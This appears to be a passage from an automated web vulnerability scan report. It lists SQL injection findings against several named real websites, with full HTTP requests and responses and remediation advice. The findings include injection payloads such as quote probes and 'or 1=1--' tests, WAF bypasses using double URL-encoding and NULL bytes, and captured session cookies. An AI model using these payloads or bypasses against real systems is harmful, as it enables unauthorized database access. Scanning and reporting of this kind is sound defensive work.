28.37. http://www.butlerrubin.com/web/br.nsf/tableback.jpg

28.38. http://www.conferenceservers.com/browser/proxy.asp

28.39. http://www.digiware.net/templates/home/favicon.ico

28.40. http://www.digiware.net/templates/intena1/favicon.ico

28.41. http://www.dmoc.com/favicon.ico

28.42. http://www.elawmarketing.com/favicon.ico

28.43. http://www.facebook.com/extern/login_status.php

28.44. http://www.foxbusiness.com/authentication/logout/submit

28.45. http://www.foxbusiness.com/static/all/generated/js/fb2-breaking-news.js

28.46. http://www.foxbusiness.com/static/all/img/global/logo-disqus-1.gif

28.47. http://www.google.com/search

28.48. http://www.hbsr.com/favicon.ico

28.49. http://www.korteco.com/sites/all/themes/korteco/favicon.ico

28.50. http://www.mimecast.com/Global/HeaderTitleVideos/Images/SecurityV4.png

28.51. http://www.moritthock.com/index.php

28.52. http://www.nytimes.com/adx/bin/adx_remote.html

28.53. http://www.privateequityinfo.com/favicon.ico

28.54. http://www.privateequityinfo.com/grfx/grfx2009/topmenu/shadow.jpg

28.55. http://www.tuckerellis.com/tucker-favicon.ico

28.56. https://www.usaa.com/favicon.ico

28.57. https://www.wellsfargo.com/img/theprivatebank/apa.jpg

28.58. http://www.wolfgreenfield.com/favicon.ico

28.59. http://www.wolfgreenfield.com/javascript/c_smartmenus.js

29. Content type is not specified

29.1. http://ad.yieldmanager.com/st

29.2. http://lfov.net/webrecorder/g/chimera.js

29.3. http://lfov.net/webrecorder/js/listen.js

29.4. https://webmail-us.mimecast.com/favicon.ico

30. SSL certificate



1. SQL injection  next
There are 9 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://da.newstogram.com/hg.php [DMUserTrack cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The DMUserTrack cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the DMUserTrack cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7'

Response 1

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7%27; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 123

Newstogram.completed({"Histogram":{"status":"error","uid":"896A200B-7889-4691-9DB7-6D96659E63C7'","ip":"173.193.214.243"}})

Request 2

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7''

Response 2

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7%27%27; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 124

Newstogram.completed({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7''","ip":"173.193.214.243"}})

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The bpp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bpp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the bpp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2%2527&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:19:45 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2728

<html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,load:g}
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305216969&channel=Topics_leaderboard&ad_type=image&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=10.2.154&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&adsafe=high&targeting=site_content&dt=1305198969022&bpp=2%2527%2527&shv=r20110427&jsv=r20110427&correlator=1305198969026&frm=0&adk=2225227735&ga_vid=1802707015.1305198969&ga_sid=1305198969&ga_hid=556056449&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1030&bih=964&fu=0&ifi=1&dtd=114&xpc=gLROVOgUps&p=http%3A//topics.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 11:19:46 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1496

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><IFRAME SRC="http://ad.doubleclick.net/adi/N4848.150143.2069808252521/B5487153;sz=728x90;click=http://googleads.g
...[SNIP]...

1.3. http://p.addthis.com/pixel [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://p.addthis.com
Path:   /pixel

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Cookie: uid=4dc048d9159e4ae3; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Cookie: uid=4dc048d9159e4ae3; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:45:07 GMT
Location: http://va.px.invitemedia.com/pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


1.4. http://p.addthis.com/pixel [uid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://p.addthis.com
Path:   /pixel

Issue detail

The uid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the uid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3%00'; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /pixel?pixelID=57148&partnerID=115&key=segment HTTP/1.1
Host: p.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3%00''; psc=0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.1FE|1304431085.1OD|1304431085.60; uit=1

Response 2

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:49:38 GMT
Location: http://va.px.invitemedia.com/pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


1.5. http://www.pomerantzlaw.com/attorneys.html [attorneyID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /attorneys.html

Issue detail

The attorneyID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attorneyID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.html?action=attorneyDetail&attorneyID=24' HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.3.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 11:49:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23344
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '24' <br />
...[SNIP]...

1.6. http://www.pomerantzlaw.com/cases.html [CaseID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pomerantzlaw.com
Path:   /cases.html

Issue detail

The CaseID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CaseID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /cases.html?action=caseDetail&CaseID=102' HTTP/1.1
Host: www.pomerantzlaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 12 May 2011 11:40:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Length: 23366
Set-Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:25 GMT
Set-Cookie: CFTOKEN=0; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:25 GMT
Content-Type: text/html; charset=UTF-8

<!-- Railo [3.2.2.000] Error -->


<script>

var plus='data:image/gif;base64,R0lGODlhCQAJAIABAAAAAP///yH5BAEAAAEALAAAAAAJAAkAAAIRhI+hG7bwoJINIktzjizeUwAAOw==';
var minus='data
...[SNIP]...
<td style="border : 1px solid #350606;background-color :#FFCC00;">Unclosed quotation mark before the character string '102' <br />
...[SNIP]...

1.7. http://www.tuckerellis.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuckerellis.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 17622879%20or%201%3d1--%20 and 17622879%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?117622879%20or%201%3d1--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Tucker+Ellis+%26+West&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:42 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Content-Length: 5043
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
   <head>
       <title>Apache HTTP Server Test Page powered by CentOS</title>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
       <style type="text/css">
           body {
               background-color: #fff;
               color: #000;
               font-size: 0.9em;
               font-family: sans-serif,helvetica;
               margin: 0;
               padding: 0;
           }
           :link {
               color: #0000FF;
           }
           :visited {
               color: #0000FF;
           }
           a:hover {
               color: #3399FF;
           }
           h1 {
               text-align: center;
               margin: 0;
               padding: 0.6em 2em 0.4em;
               background-color: #3399FF;
               color: #ffffff;
               font-weight: normal;
               font-size: 1.75em;
               border-bottom: 2px solid #000;
           }
           h1 strong {
               font-weight: bold;
           }
           h2 {
               font-size: 1.1em;
               font-weight: bold;
           }
           .content {
               padding: 1em 5em;
           }
           .content-columns {
               /* Setting relative positioning allows for
               absolute positioning for sub-classes */
               position: relative;
               padding-top: 1em;
           }
           .content-column-left {
               /* Value for IE/Win; will be overwritten for other browsers */
               width: 47%;
               padding-right: 3%;
               float: left;
               padding-bottom: 2em;
           }
           .content-column-right {
               /* Values for IE/Win; will be overwritten for other browsers */
               width: 47%;
               padding-left: 3%;
               float: left;
               padding-bottom: 2em;
           }
           .content-columns>.content-column-left, .content-columns>.content-column-right {
               /* Non-IE/Win */
           }
           img {
               border: 2px solid #fff;
               padding: 2px;
               margin: 2px;
           }
           a:hover img {
               border: 2px solid #3399FF;
           }
       </style>
   </head>

   <body>
   <h1>Apache 2 Test Page<br><font size="-1"><strong>powered by</font> CentOS</strong></h1>

       <div class="content">
           <div class=
...[SNIP]...

Request 2

GET /?117622879%20or%201%3d2--%20=1 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Tucker+Ellis+%26+West&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Tue, 03 Jul 2001 06:00:00 GMT
Last-Modified: Thu, 12 May 2011 12:21:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Tucker Ellis &amp; West LLP</title>
<meta name="description" content="Tucker Ellis &amp; West LLP is an Ohio based law firm specializing in Business Litigation, Mass Tort, and Product Liability."></meta>
<link rel="stylesheet" type="text/css" href="css/home.css" />
<link rel="shortcut icon" href="tucker-favicon.ico" />
<script type="text/javascript" src="javascript/functions.js"></script>
</head>

<body onload="MM_preloadImages('images/over/Untitled-1-copy_01.jpg','images/over/Untitled-1-copy_02.jpg','images/over/Untitled-1-copy_03.jpg','images/over/Untitled-1-copy_04.jpg','images/over/Untitled-1-copy_05.jpg','images/over/Untitled-1-copy_06.jpg','images/over/Untitled-1-copy_07.jpg','images/over/Untitled-1-copy_13.jpg','images/over/Untitled-1-copy_14.jpg','images/over/Untitled-1-copy_10.jpg','images/over/Untitled-1-copy_16.jpg','images/over/Untitled-1-copy_09.jpg','images/over/Untitled-1-copy_12.jpg','images/over/Untitled-1-copy_17.jpg')">

<div id="wrapper">

<div id="container">

<div id="mast_head">

<div id="home_logo">
<img src="images/logo.gif" alt="Tucker Ellis &amp; West" width="367" height="50" id="logo" border="0" title="Tucker Ellis &amp; West" />
</div>

<div id="phrase">
&nbsp;
</div>
</div>

</div>

<div style="clear:both"></div>


<div id="navigation">
<ul id="nav_main">
<li id="nm_1"
...[SNIP]...

1.8. http://www.tuckerellis.com/tucker-favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.tuckerellis.com
Path:   /tucker-favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10924747'%20or%201%3d1--%20 and 10924747'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tucker-favicon.ico10924747'%20or%201%3d1--%20 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 1

HTTP/1.1 403 Forbidden
Date: Thu, 12 May 2011 12:21:47 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /tucker-favicon.ico10924747' or 1=1--
on this server.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at www.tuckerellis.com Port 80</address>
</body></html>

Request 2

GET /tucker-favicon.ico10924747'%20or%201%3d2--%20 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
